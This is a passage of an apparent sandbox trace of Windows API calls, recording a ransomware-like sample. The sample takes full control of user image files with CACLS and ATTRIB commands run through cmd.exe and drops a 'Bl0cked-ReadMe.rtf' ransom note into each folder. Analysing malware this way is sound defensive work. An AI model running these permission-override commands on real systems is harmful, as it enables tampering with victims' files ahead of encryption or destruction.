lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png", lpFilePart=0x12eab4*="overlay.png") returned 0x63 [0148.473] GetLastError () returned 0x5 [0148.473] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0148.473] LocalFree (hMem=0x1c6cc8) returned 0x0 [0148.473] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0148.473] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0148.474] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0148.474] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0148.474] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0148.474] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0148.474] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\"", lpProcessInformation=0x12fba4*(hProcess=0x110, hThread=0x114, dwProcessId=0xb3c, dwThreadId=0xb04)) returned 1 [0148.476] WaitForSingleObject (hHandle=0x110, dwMilliseconds=0xffffffff) returned 0x0 [0148.847] CloseHandle (hObject=0x110) returned 1 [0148.847] CloseHandle (hObject=0x114) returned 1 [0148.847] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0148.847] ReleaseMutex (hMutex=0xf8) returned 1 [0148.847] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0148.847] ReleaseMutex (hMutex=0xf8) returned 1 [0148.847] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0148.847] ReleaseMutex (hMutex=0xf8) returned 1 [0148.847] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0148.847] ReleaseMutex (hMutex=0xf8) returned 1 [0148.847] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0148.848] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png", lpFilePart=0x12eab4*="overlay.png") returned 0x63 [0148.848] GetLastError () returned 0x5 [0148.848] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0148.848] LocalFree (hMem=0x1c6cc8) returned 0x0 [0148.848] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0148.848] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0148.848] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0148.848] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0148.848] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{113527A4-45D4-4B6F-B567-97838F1B04B0}\\") returned 0x58 [0148.848] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{113527A4-45D4-4B6F-B567-97838F1B04B0}\\") returned 0x58 [0148.848] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{113527A4-45D4-4B6F-B567-97838F1B04B0}\\", cchCount1=88, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{113527A4-45D4-4B6F-B567-97838F1B04B0}\\", cchCount2=88) returned 2 [0148.848] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0148.848] ReleaseMutex (hMutex=0xf8) returned 1 [0148.848] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0148.848] ReleaseMutex (hMutex=0xf8) returned 1 [0148.848] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0148.849] ReleaseMutex (hMutex=0xf8) returned 1 [0148.849] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0148.849] ReleaseMutex (hMutex=0xf8) returned 1 [0148.849] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0148.902] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png", lpFilePart=0x12eab4*="superbar.png") returned 0x64 [0148.902] GetLastError () returned 0x5 [0148.902] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0148.902] LocalFree (hMem=0x1c6cc8) returned 0x0 [0148.902] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0148.902] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0148.903] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0148.903] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0148.903] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0148.903] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0148.903] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png\"", lpProcessInformation=0x12fba4*(hProcess=0x110, hThread=0x114, dwProcessId=0xb00, dwThreadId=0xc20)) returned 1 [0148.904] WaitForSingleObject (hHandle=0x110, dwMilliseconds=0xffffffff) returned 0x0 [0149.092] CloseHandle (hObject=0x110) returned 1 [0149.092] CloseHandle (hObject=0x114) returned 1 [0149.092] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0149.092] ReleaseMutex (hMutex=0xf8) returned 1 [0149.092] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0149.092] ReleaseMutex (hMutex=0xf8) returned 1 [0149.092] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0149.092] ReleaseMutex (hMutex=0xf8) returned 1 [0149.092] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0149.092] ReleaseMutex (hMutex=0xf8) returned 1 [0149.092] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0149.092] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png", lpFilePart=0x12eab4*="superbar.png") returned 0x64 [0149.092] GetLastError () returned 0x5 [0149.092] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0149.092] LocalFree (hMem=0x1c6cc8) returned 0x0 [0149.092] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0149.092] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0149.093] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0149.093] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0149.093] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{113527A4-45D4-4B6F-B567-97838F1B04B0}\\") returned 0x58 [0149.093] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{113527A4-45D4-4B6F-B567-97838F1B04B0}\\") returned 0x58 [0149.093] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{113527A4-45D4-4B6F-B567-97838F1B04B0}\\", cchCount1=88, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{113527A4-45D4-4B6F-B567-97838F1B04B0}\\", cchCount2=88) returned 2 [0149.093] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0149.093] ReleaseMutex (hMutex=0xf8) returned 1 [0149.093] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0149.093] ReleaseMutex (hMutex=0xf8) returned 1 [0149.093] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0149.093] ReleaseMutex (hMutex=0xf8) returned 1 [0149.093] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0149.093] ReleaseMutex (hMutex=0xf8) returned 1 [0149.093] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0149.093] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png", lpFilePart=0x12eab4*="background.png") returned 0x66 [0149.093] GetLastError () returned 0x5 [0149.093] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0149.093] LocalFree (hMem=0x1c6cc8) returned 0x0 [0149.093] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0149.093] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0149.094] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0149.094] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0149.094] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0149.094] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0149.094] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png\"", lpProcessInformation=0x12fba4*(hProcess=0x110, hThread=0x114, dwProcessId=0xc10, dwThreadId=0x390)) returned 1 [0149.095] WaitForSingleObject (hHandle=0x110, dwMilliseconds=0xffffffff) returned 0x0 [0149.447] CloseHandle (hObject=0x110) returned 1 [0149.447] CloseHandle (hObject=0x114) returned 1 [0149.447] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0149.447] ReleaseMutex (hMutex=0xf8) returned 1 [0149.447] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0149.447] ReleaseMutex (hMutex=0xf8) returned 1 [0149.447] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0149.447] ReleaseMutex (hMutex=0xf8) returned 1 [0149.447] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0149.447] ReleaseMutex (hMutex=0xf8) returned 1 [0149.447] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0149.448] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png", lpFilePart=0x12eab4*="background.png") returned 0x66 [0149.448] GetLastError () returned 0x5 [0149.448] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0149.448] LocalFree (hMem=0x1c6cc8) returned 0x0 [0149.448] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0149.448] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0149.448] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0149.448] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0149.448] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0149.448] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{113527A4-45D4-4B6F-B567-97838F1B04B0}\\") returned 0x58 [0149.448] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\", cchCount1=88, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{113527A4-45D4-4B6F-B567-97838F1B04B0}\\", cchCount2=88) returned 3 [0149.448] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0149.448] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0149.448] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\", cchCount1=88, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0149.448] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0149.449] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0149.449] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0149.449] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\") returned 0x34 [0149.449] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0149.449] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0149.449] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0x46c, dwThreadId=0x8d4)) returned 1 [0149.451] CloseHandle (hObject=0x110) returned 1 [0149.451] CloseHandle (hObject=0x114) returned 1 [0149.451] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\bl0cked-readme.rtf")) returned 0xffffffff [0149.451] GetLastError () returned 0x2 [0149.451] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0149.544] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\bl0cked-readme.rtf")) returned 0x20 [0149.544] CompareStringW 